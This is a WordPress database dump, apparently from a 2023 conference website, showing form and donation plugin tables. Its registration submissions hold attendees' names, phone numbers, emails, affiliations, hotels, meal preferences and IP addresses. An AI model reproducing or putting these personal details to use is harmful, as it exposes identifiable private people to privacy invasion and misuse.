(94,1,94,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Kaan\",\"last_name\":\"Karaman\"},\"country-list\":\"TR\",\"subject_2\":\"University of Zurich\",\"input_text\":\"+41 76 571 1993\",\"email\":\"kaankaramanofficial@gmail.com\",\"numeric-field\":\"1320\",\"subject_1\":\"CAIRO RAMSES HILTON HOTEL\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"I like the non-spicy foods with cooked in olive oil (any kind of meal in Mediterranean cuisine). It could also be meat (without any sauce and without the coriander\\/parsley).\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Safari','Apple','89.206.81.132',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 18:34:09','2023-08-31 18:34:09'),
(95,1,95,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"3946067dbf\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Sungjoo\",\"last_name\":\"Yoon\"},\"country-list\":\"KR\",\"subject_2\":\"Inha University\",\"input_text\":\"+82-10-5094-0609\",\"email\":\"22181415@inha.edu\",\"numeric-field\":\"727\",\"subject_1\":\"I don\'t know. My co-worker know that only;\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Pasta and Pizza. also korean food\",\"message\":\"See you soon!\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','165.246.31.189',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 18:36:09','2023-08-31 18:36:09'),
(96,1,96,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"3946067dbf\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Dimitrios\",\"last_name\":\"Skarlatos\"},\"country-list\":\"GR\",\"subject_2\":\"Prof.\",\"input_text\":\"+35797675386\",\"email\":\"dimitrios.skarlatos@cut.ac.cy\",\"numeric-field\":\"1247\",\"subject_1\":\"Novotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"all types\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','46.251.117.127',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-09-01 00:19:46','2023-09-01 00:19:46'),
(97,1,97,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"361ed9905c\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Yiping\",\"last_name\":\"Chen\"},\"country-list\":\"CN\",\"subject_2\":\"Sun Yan-sen University\",\"input_text\":\"+8613787100178\",\"email\":\"chenyp79@mail.sysu.edu.cn\",\"numeric-field\":\"1637\",\"subject_1\":\"InterContinental Hotels\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','46.232.121.98',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-09-01 11:27:02','2023-09-01 11:27:02'),
(98,1,98,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"361ed9905c\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Erkki Tobias\",\"last_name\":\"Bartczak\"},\"country-list\":\"DE\",\"subject_2\":\"KU Leuven\",\"input_text\":\"+32 471 352327\",\"email\":\"erkkitobias.bartczak@kuleuven.be\",\"numeric-field\":\"1642\",\"subject_1\":\"Up Town Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Veggy\",\"message\":\"\",\"datetime\":\"28\\/12\\/1992\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','109.143.127.12',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-09-01 13:46:12','2023-09-01 13:46:12'),
(99,1,99,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"4ccda819a3\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Dominique\",\"last_name\":\"Courault\"},\"country-list\":\"FR\",\"subject_2\":\"Inrae\",\"input_text\":\"33637551420\",\"email\":\"dominique.courault84@gmail.com\",\"numeric-field\":\"1888\",\"subject_1\":\"Hotel champollion\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Android','41.239.179.175',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-09-01 19:21:50','2023-09-01 19:21:50'),
(100,1,100,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"7f9a26881c\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"\",\"last_name\":\"\"},\"country-list\":\"DE\",\"subject_2\":\"German Aerospace Center (DLR)\",\"input_text\":\"00491749115861\",\"email\":\"nina.merkle@dlr.fe\",\"numeric-field\":\"232\",\"subject_1\":\"City view Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"We have 10 people staying in this hotel\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'iPhone','iPhone','178.27.171.241',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-09-02 14:25:53','2023-09-02 14:25:53');
/*!40000 ALTER TABLE `dnctiavkr_fluentform_submissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_frm_fields`
--

DROP TABLE IF EXISTS `dnctiavkr_frm_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_frm_fields` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `field_key` varchar(100) DEFAULT NULL,
  `name` text DEFAULT NULL,
  `description` longtext DEFAULT NULL,
  `type` text DEFAULT NULL,
  `default_value` longtext DEFAULT NULL,
  `options` longtext DEFAULT NULL,
  `field_order` int(11) DEFAULT 0,
  `required` int(1) DEFAULT NULL,
  `field_options` longtext DEFAULT NULL,
  `form_id` int(11) DEFAULT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `field_key` (`field_key`),
  KEY `form_id` (`form_id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_frm_fields`
--

LOCK TABLES `dnctiavkr_frm_fields` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_frm_fields` DISABLE KEYS */;
INSERT INTO `dnctiavkr_frm_fields` VALUES
(1,'qh4icy','Name','First','text','','',1,1,'a:16:{s:4:\"size\";s:0:\"\";s:3:\"max\";s:0:\"\";s:5:\"label\";s:0:\"\";s:5:\"blank\";s:0:\"\";s:18:\"required_indicator\";s:1:\"*\";s:7:\"invalid\";s:0:\"\";s:14:\"separate_value\";i:0;s:14:\"clear_on_focus\";i:0;s:7:\"classes\";s:18:\"frm_first frm_half\";s:11:\"custom_html\";s:514:\"<div id=\"frm_field_[id]_container\" class=\"frm_form_field form-field [required_class][error_class]\">\n    <label for=\"field_[key]\" id=\"field_[key]_label\" class=\"frm_primary_label\">[field_name]\n        <span class=\"frm_required\" aria-hidden=\"true\">[required_label]</span>\n    </label>\n    [input]\n    [if description]<div class=\"frm_description\" id=\"frm_desc_field_[key]\">[description]</div>[/if description]\n    [if error]<div class=\"frm_error\" role=\"alert\" id=\"frm_error_field_[key]\">[error]</div>[/if error]\n</div>\";s:6:\"minnum\";i:1;s:6:\"maxnum\";i:10;s:4:\"step\";i:1;s:6:\"format\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:10:\"in_section\";i:0;}',1,'2023-08-22 21:58:26'),
(2,'ocfup1','Last','Last','text','','',2,1,'a:16:{s:4:\"size\";s:0:\"\";s:3:\"max\";s:0:\"\";s:5:\"label\";s:6:\"hidden\";s:5:\"blank\";s:0:\"\";s:18:\"required_indicator\";s:1:\"*\";s:7:\"invalid\";s:0:\"\";s:14:\"separate_value\";i:0;s:14:\"clear_on_focus\";i:0;s:7:\"classes\";s:8:\"frm_half\";s:11:\"custom_html\";s:514:\"<div id=\"frm_field_[id]_container\" class=\"frm_form_field form-field [required_class][error_class]\">\n    <label for=\"field_[key]\" id=\"field_[key]_label\" class=\"frm_primary_label\">[field_name]\n        <span class=\"frm_required\" aria-hidden=\"true\">[required_label]</span>\n    </label>\n    [input]\n    [if description]<div class=\"frm_description\" id=\"frm_desc_field_[key]\">[description]</div>[/if description]\n    [if error]<div class=\"frm_error\" role=\"alert\" id=\"frm_error_field_[key]\">[error]</div>[/if error]\n</div>\";s:6:\"minnum\";i:1;s:6:\"maxnum\";i:10;s:4:\"step\";i:1;s:6:\"format\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:10:\"in_section\";i:0;}',1,'2023-08-22 21:58:26'),
(3,'29yf4d','Email','','email','','',3,1,'a:16:{s:4:\"size\";s:0:\"\";s:3:\"max\";s:0:\"\";s:5:\"label\";s:0:\"\";s:5:\"blank\";s:0:\"\";s:18:\"required_indicator\";s:1:\"*\";s:7:\"invalid\";s:34:\"Please enter a valid email address\";s:14:\"separate_value\";i:0;s:14:\"clear_on_focus\";i:0;s:7:\"classes\";s:8:\"frm_full\";s:11:\"custom_html\";s:514:\"<div id=\"frm_field_[id]_container\" class=\"frm_form_field form-field [required_class][error_class]\">\n    <label for=\"field_[key]\" id=\"field_[key]_label\" class=\"frm_primary_label\">[field_name]\n        <span class=\"frm_required\" aria-hidden=\"true\">[required_label]</span>\n    </label>\n    [input]\n    [if description]<div class=\"frm_description\" id=\"frm_desc_field_[key]\">[description]</div>[/if description]\n    [if error]<div class=\"frm_error\" role=\"alert\" id=\"frm_error_field_[key]\">[error]</div>[/if error]\n</div>\";s:6:\"minnum\";i:1;s:6:\"maxnum\";i:10;s:4:\"step\";i:1;s:6:\"format\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:10:\"in_section\";i:0;}',1,'2023-08-22 21:58:26'),
(4,'e6lis6','Subject','','text','','',5,1,'a:16:{s:4:\"size\";s:0:\"\";s:3:\"max\";s:0:\"\";s:5:\"label\";s:0:\"\";s:5:\"blank\";s:0:\"\";s:18:\"required_indicator\";s:1:\"*\";s:7:\"invalid\";s:0:\"\";s:14:\"separate_value\";i:0;s:14:\"clear_on_focus\";i:0;s:7:\"classes\";s:8:\"frm_full\";s:11:\"custom_html\";s:514:\"<div id=\"frm_field_[id]_container\" class=\"frm_form_field form-field [required_class][error_class]\">\n    <label for=\"field_[key]\" id=\"field_[key]_label\" class=\"frm_primary_label\">[field_name]\n        <span class=\"frm_required\" aria-hidden=\"true\">[required_label]</span>\n    </label>\n    [input]\n    [if description]<div class=\"frm_description\" id=\"frm_desc_field_[key]\">[description]</div>[/if description]\n    [if error]<div class=\"frm_error\" role=\"alert\" id=\"frm_error_field_[key]\">[error]</div>[/if error]\n</div>\";s:6:\"minnum\";i:1;s:6:\"maxnum\";i:10;s:4:\"step\";i:1;s:6:\"format\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:10:\"in_section\";i:0;}',1,'2023-08-22 21:58:26'),
(5,'9jv0r1','Message','','textarea','','',6,1,'a:16:{s:4:\"size\";s:0:\"\";s:3:\"max\";s:1:\"5\";s:5:\"label\";s:0:\"\";s:5:\"blank\";s:0:\"\";s:18:\"required_indicator\";s:1:\"*\";s:7:\"invalid\";s:0:\"\";s:14:\"separate_value\";i:0;s:14:\"clear_on_focus\";i:0;s:7:\"classes\";s:8:\"frm_full\";s:11:\"custom_html\";s:514:\"<div id=\"frm_field_[id]_container\" class=\"frm_form_field form-field [required_class][error_class]\">\n    <label for=\"field_[key]\" id=\"field_[key]_label\" class=\"frm_primary_label\">[field_name]\n        <span class=\"frm_required\" aria-hidden=\"true\">[required_label]</span>\n    </label>\n    [input]\n    [if description]<div class=\"frm_description\" id=\"frm_desc_field_[key]\">[description]</div>[/if description]\n    [if error]<div class=\"frm_error\" role=\"alert\" id=\"frm_error_field_[key]\">[error]</div>[/if error]\n</div>\";s:6:\"minnum\";i:1;s:6:\"maxnum\";i:10;s:4:\"step\";i:1;s:6:\"format\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:10:\"in_section\";i:0;}',1,'2023-08-22 21:58:26'),
(6,'dw6ve','Number','','number','','',7,0,'a:15:{s:4:\"size\";s:0:\"\";s:3:\"max\";s:0:\"\";s:5:\"label\";s:0:\"\";s:5:\"blank\";s:0:\"\";s:18:\"required_indicator\";s:1:\"*\";s:7:\"invalid\";s:0:\"\";s:14:\"separate_value\";i:0;s:14:\"clear_on_focus\";i:0;s:7:\"classes\";s:0:\"\";s:11:\"custom_html\";s:514:\"<div id=\"frm_field_[id]_container\" class=\"frm_form_field form-field [required_class][error_class]\">\n    <label for=\"field_[key]\" id=\"field_[key]_label\" class=\"frm_primary_label\">[field_name]\n        <span class=\"frm_required\" aria-hidden=\"true\">[required_label]</span>\n    </label>\n    [input]\n    [if description]<div class=\"frm_description\" id=\"frm_desc_field_[key]\">[description]</div>[/if description]\n    [if error]<div class=\"frm_error\" role=\"alert\" id=\"frm_error_field_[key]\">[error]</div>[/if error]\n</div>\";s:6:\"minnum\";i:0;s:6:\"maxnum\";i:9999999;s:4:\"step\";s:3:\"any\";s:6:\"format\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}',1,'2023-08-22 22:19:42');
/*!40000 ALTER TABLE `dnctiavkr_frm_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_frm_forms`
--

DROP TABLE IF EXISTS `dnctiavkr_frm_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_frm_forms` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_key` varchar(100) DEFAULT NULL,
  `name` varchar(255) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `parent_form_id` int(11) DEFAULT 0,
  `logged_in` tinyint(1) DEFAULT NULL,
  `editable` tinyint(1) DEFAULT NULL,
  `is_template` tinyint(1) DEFAULT 0,
  `default_template` tinyint(1) DEFAULT 0,
  `status` varchar(255) DEFAULT NULL,
  `options` longtext DEFAULT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `form_key` (`form_key`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_frm_forms`
--

LOCK TABLES `dnctiavkr_frm_forms` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_frm_forms` DISABLE KEYS */;
INSERT INTO `dnctiavkr_frm_forms` VALUES
(1,'contact-form','Contact Us','We would like to hear from you. Please send us a message by filling out the form below and we will get back with you shortly.',0,0,0,0,0,'published','a:18:{s:12:\"custom_style\";i:1;s:12:\"submit_value\";s:6:\"Submit\";s:14:\"success_action\";s:7:\"message\";s:11:\"success_msg\";s:54:\"Your responses were successfully submitted. Thank you!\";s:9:\"show_form\";i:0;s:7:\"akismet\";s:0:\"\";s:8:\"honeypot\";s:5:\"basic\";s:8:\"antispam\";i:0;s:7:\"no_save\";i:0;s:9:\"ajax_load\";i:0;s:11:\"js_validate\";i:0;s:10:\"form_class\";s:0:\"\";s:11:\"before_html\";s:224:\"<legend class=\"frm_screen_reader\">[form_name]</legend>\n[if form_name]<h3 class=\"frm_form_title\">[form_name]</h3>[/if form_name]\n[if form_description]<div class=\"frm_description\">[form_description]</div>[/if form_description]\";s:10:\"after_html\";s:0:\"\";s:11:\"submit_html\";s:514:\"<div class=\"frm_submit\">\n[if back_button]<button type=\"submit\" name=\"frm_prev_page\" formnovalidate=\"formnovalidate\" class=\"frm_prev_page\" [back_hook]>[back_label]</button>[/if back_button]\n<button class=\"frm_button_submit\" type=\"submit\"  [button_action]>[button_label]</button>\n[if save_draft]<a href=\"#\" tabindex=\"0\" class=\"frm_save_draft\" [draft_hook]>[draft_label]</a>[/if save_draft]\n[if start_over]<a href=\"#\" tabindex=\"0\" class=\"frm_start_over\" [start_over_hook]>[start_over_label]</a>[/if start_over]\n</div>\";s:10:\"show_title\";i:0;s:16:\"show_description\";i:0;s:11:\"ajax_submit\";i:0;}','2023-08-22 21:58:26');
/*!40000 ALTER TABLE `dnctiavkr_frm_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_frm_item_metas`
--

DROP TABLE IF EXISTS `dnctiavkr_frm_item_metas`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_frm_item_metas` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `meta_value` longtext DEFAULT NULL,
  `field_id` bigint(20) NOT NULL,
  `item_id` bigint(20) NOT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `field_id` (`field_id`),
  KEY `item_id` (`item_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_frm_item_metas`
--

LOCK TABLES `dnctiavkr_frm_item_metas` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_frm_item_metas` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_frm_item_metas` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_frm_items`
--

DROP TABLE IF EXISTS `dnctiavkr_frm_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_frm_items` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `item_key` varchar(100) DEFAULT NULL,
  `name` varchar(255) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `ip` text DEFAULT NULL,
  `form_id` bigint(20) DEFAULT NULL,
  `post_id` bigint(20) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `parent_item_id` bigint(20) DEFAULT 0,
  `is_draft` tinyint(1) DEFAULT 0,
  `updated_by` bigint(20) DEFAULT NULL,
  `created_at` datetime NOT NULL,
  `updated_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `item_key` (`item_key`),
  KEY `form_id` (`form_id`),
  KEY `post_id` (`post_id`),
  KEY `user_id` (`user_id`),
  KEY `parent_item_id` (`parent_item_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_frm_items`
--

LOCK TABLES `dnctiavkr_frm_items` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_frm_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_frm_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_commentmeta`
--

DROP TABLE IF EXISTS `dnctiavkr_give_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_commentmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `give_comment_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `give_comment_id` (`give_comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_commentmeta`
--

LOCK TABLES `dnctiavkr_give_commentmeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_comments`
--

DROP TABLE IF EXISTS `dnctiavkr_give_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_comments` (
  `comment_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `comment_content` longtext NOT NULL,
  `comment_parent` mediumtext NOT NULL,
  `comment_type` mediumtext NOT NULL,
  `comment_date` datetime NOT NULL,
  `comment_date_gmt` datetime NOT NULL,
  PRIMARY KEY (`comment_ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_comments`
--

LOCK TABLES `dnctiavkr_give_comments` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_donationmeta`
--

DROP TABLE IF EXISTS `dnctiavkr_give_donationmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_donationmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `donation_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `donation_id` (`donation_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_donationmeta`
--

LOCK TABLES `dnctiavkr_give_donationmeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_donationmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_donationmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_donormeta`
--

DROP TABLE IF EXISTS `dnctiavkr_give_donormeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_donormeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `donor_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `donor_id` (`donor_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_donormeta`
--

LOCK TABLES `dnctiavkr_give_donormeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_donormeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_donormeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_donors`
--

DROP TABLE IF EXISTS `dnctiavkr_give_donors`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_donors` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `email` varchar(255) NOT NULL,
  `name` mediumtext NOT NULL,
  `purchase_value` mediumtext NOT NULL,
  `purchase_count` bigint(20) NOT NULL,
  `payment_ids` longtext NOT NULL,
  `date_created` datetime NOT NULL,
  `token` varchar(255) NOT NULL,
  `verify_key` varchar(255) NOT NULL,
  `verify_throttle` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `email` (`email`),
  KEY `user` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_donors`
--

LOCK TABLES `dnctiavkr_give_donors` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_donors` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_give_donors` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_give_formmeta`
--

DROP TABLE IF EXISTS `dnctiavkr_give_formmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_give_formmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `form_id` (`form_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=57 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_give_formmeta`
--

LOCK TABLES `dnctiavkr_give_formmeta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_give_formmeta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_give_formmeta` VALUES
(1,21,'_give_onboarding_default_form','1'),
(2,21,'_give_levels_minimum_amount','10'),
(3,21,'_give_levels_maximim_amount','250'),
(4,21,'_give_form_template','sequoia'),
(5,21,'_give_form_status','open'),
(6,21,'_give_sequoia_form_template_settings','a:5:{s:12:\"introduction\";a:6:{s:7:\"enabled\";s:7:\"enabled\";s:8:\"headline\";s:17:\"Support Our Cause\";s:11:\"description\";s:104:\"Help our organization by donating today! All donations go directly to making a difference for our cause.\";s:5:\"image\";s:100:\"https://gsw2023.com/wp-content/plugins/give/assets/dist/images/onboarding-preview-form-image.min.jpg\";s:13:\"primary_color\";s:7:\"#4fa651\";s:12:\"donate_label\";s:10:\"Donate Now\";}s:14:\"payment_amount\";a:3:{s:12:\"header_label\";s:13:\"Choose Amount\";s:7:\"content\";s:128:\"How much would you like to donate? As a contributor to Gsw2023 we make sure your donation goes directly to supporting our cause.\";s:10:\"next_label\";s:8:\"Continue\";}s:17:\"visual_appearance\";a:3:{s:16:\"decimals_enabled\";s:8:\"disabled\";s:13:\"primary_color\";s:7:\"#28C77B\";s:12:\"google-fonts\";s:7:\"enabled\";}s:19:\"payment_information\";a:7:{s:12:\"header_label\";s:20:\"Add Your Information\";s:8:\"headline\";s:19:\"Who\'s giving today?\";s:11:\"description\";s:49:\"We’ll never share this information with anyone.\";s:24:\"donation_summary_enabled\";s:7:\"enabled\";s:24:\"donation_summary_heading\";s:35:\"Here\'s what you\'re about to donate:\";s:25:\"donation_summary_location\";s:32:\"give_donation_form_before_submit\";i:0;a:7:{s:2:\"id\";s:14:\"checkout_label\";s:4:\"name\";s:13:\"Submit Button\";s:4:\"desc\";s:43:\"The button label for completing a donation.\";s:4:\"type\";s:11:\"text_medium\";s:10:\"attributes\";a:1:{s:11:\"placeholder\";s:10:\"Donate Now\";}s:7:\"default\";s:10:\"Donate Now\";s:18:\"mapToLegacySetting\";s:20:\"_give_checkout_label\";}}s:9:\"thank-you\";a:6:{s:5:\"image\";s:0:\"\";s:8:\"headline\";s:22:\"A great big thank you!\";s:11:\"description\";s:143:\"{name}, your contribution means a lot and will be put to good use in making a difference. We’ve sent your donation receipt to {donor_email}. \";s:7:\"sharing\";s:7:\"enabled\";s:19:\"sharing_instruction\";s:77:\"Help spread the word by sharing your support with your friends and followers!\";s:15:\"twitter_message\";s:38:\"I just gave to this cause. Who\'s next?\";}}'),
(7,21,'_give_checkout_label','Donate Now'),
(8,21,'_give_display_style','buttons'),
(9,21,'_give_payment_display','button'),
(10,21,'_give_form_floating_labels','disabled'),
(11,21,'_give_reveal_label','Donate Now'),
(12,21,'_give_display_content','disabled'),
(13,21,'_give_content_placement',''),
(14,21,'_give_form_content',''),
(15,21,'_give_price_option','multi'),
(16,21,'_give_set_price','1'),
(17,21,'_give_custom_amount','enabled'),
